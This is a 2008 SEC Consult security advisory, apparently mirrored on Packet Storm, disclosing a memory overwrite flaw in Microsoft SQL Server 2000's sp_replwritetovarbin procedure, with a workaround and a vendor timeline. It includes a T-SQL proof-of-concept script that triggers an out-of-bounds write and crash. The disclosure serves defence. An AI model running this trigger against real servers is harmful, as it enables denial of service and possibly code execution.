exploit the possibilities

SEC Consult Security Advisory SA-20081109-0

SEC Consult Security Advisory SA-20081109-0
Posted Dec 9, 2008
Authored by Bernhard Mueller | Site sec-consult.com

SEC Consult Security Advisory 20081209-0 - Microsoft SQL Server suffers from a limited memory overwrite vulnerability.By calling the extended stored procedure sp_replwritetovarbin, and supplying several uninitialized variables as parameters, it is possible to trigger a memory write to a controlled location. Depending on the underlying Windows version, it is / may be possible to use this vulnerability to execute arbitrary code in the context of the vulnerable SQL server process. In a default configuration, the sp_replwritetovarbin stored procedure is accessible by anyone. The vulnerability can be exploited by an authenticated user with a direct database connection, or via SQL injection in a vulnerable web application. Versions 8.00.2039 and below are affected.

tags | advisory, web, arbitrary, sql injection
systems | windows
MD5 | 40dcb1354e0bf37319f474c7057b717d

SEC Consult Security Advisory SA-20081109-0

Change Mirror Download
SEC Consult Security Advisory < 20081209-0 >
=====================================================================================
title: Microsoft SQL Server 2000 sp_replwritetovarbin
limited memory overwrite vulnerability
program: Microsoft SQL Server 2000
vulnerable version: <=8.00.2039
homepage: www.microsoft.com
found: 04-12-2008
by: Bernhard Mueller (SEC Consult Vulnerability
Lab)
perm. link:
http://www.sec-consult.com/files/20081209_mssql-2000-sp_replwritetovarbin_memwrite.txt
=====================================================================================

Product description:
--------------------

Microsoft SQL Server is a relational database management system (RDBMS)
produced by Microsoft. Its primary query language is Transact-SQL, an
implementation of the ANSI/ISO standard Structured Query Language (SQL)
used by both Microsoft and Sybase.


Vulnerabilty overview:
----------------------

By calling the extended stored procedure sp_replwritetovarbin, and
supplying several uninitialized variables as parameters, it is possible
to trigger a memory write to a controlled location. Depending on the
underlying Windows version, it is / may be possible to use this
vulnerability to execute arbitrary code in the context of the vulnerable
SQL server process.
In a default configuration, the sp_replwritetovarbin stored procedure is
accessible by anyone. The vulnerability can be exploited by an
authenticated user with a direct database connection, or via SQL
injection in a vulnerable web application.


Vulnerability details:
----------------------

The following T-SQL script can be used to test for the vulnerability:


--------------------------------
DECLARE @buf NVARCHAR(4000),
@val NVARCHAR(4),
@counter INT

SET @buf = '
declare @retcode int,
@end_offset int,
@vb_buffer varbinary,
@vb_bufferlen int,
@buf nvarchar;
exec master.dbo.sp_replwritetovarbin 1,
@end_offset output,
@vb_buffer output,
@vb_bufferlen output,'''

SET @val = CHAR(0x41)

SET @counter = 0
WHILE @counter < 3000
BEGIN
SET @counter = @counter + 1
SET @buf = @buf + @val
END

SET @buf = @buf + ''',''1'',''1'',''1'',
''1'',''1'',''1'',''1'',''1'',''1'''

EXEC master..sp_executesql @buf
--------------------------------


This triggers an access violation exception (write to address
0x41414141).
The vulnerability has been successfully used to execute arbitrary code
on a lab machine.
SEC Consult will not release code execution exploits for this
vulnerability to the public.


Workaround:
-----------

Remove the sp_replwriterovarbin extended stored procedure. Run the
following as an administrator:

execute dbo.sp_dropextendedproc 'sp_replwritetovarbin'

See also:

"Removing an Extended Stored Procedure from SQL Server"
http://msdn.microsoft.com/en-us/library/aa215995(SQL.80).aspx


Patch:
------

According to an email received by Microsoft in September, a fix for this
vulnerability has been completed.
The release schedule for this fix is currently unknown.


Vendor timeline:
---------------
Vendor notified: 2008-04-17
Vendor response: 2008-04-17
Last response from Microsoft: 09-29-2008
Request for update status 1: 10-14-2008
Request for update status 2: 10-29-2008
Request for update status 3: 11-12-2008
Request for update status 4
and prenotification about advisory release date: 11-28-2008
Public release: 11-09-2008

--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Unternehmensberatung GmbH

Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria

Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
www.sec-consult.com

EOF Bernhard Mueller / @2008

Login or Register to add favorites

File Archive:

September 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    20 Files
  • 2
    Sep 2nd
    15 Files
  • 3
    Sep 3rd
    15 Files
  • 4
    Sep 4th
    4 Files
  • 5
    Sep 5th
    1 Files
  • 6
    Sep 6th
    1 Files
  • 7
    Sep 7th
    15 Files
  • 8
    Sep 8th
    27 Files
  • 9
    Sep 9th
    7 Files
  • 10
    Sep 10th
    16 Files
  • 11
    Sep 11th
    9 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    25 Files
  • 15
    Sep 15th
    15 Files
  • 16
    Sep 16th
    15 Files
  • 17
    Sep 17th
    15 Files
  • 18
    Sep 18th
    12 Files
  • 19
    Sep 19th
    1 Files
  • 20
    Sep 20th
    1 Files
  • 21
    Sep 21st
    14 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close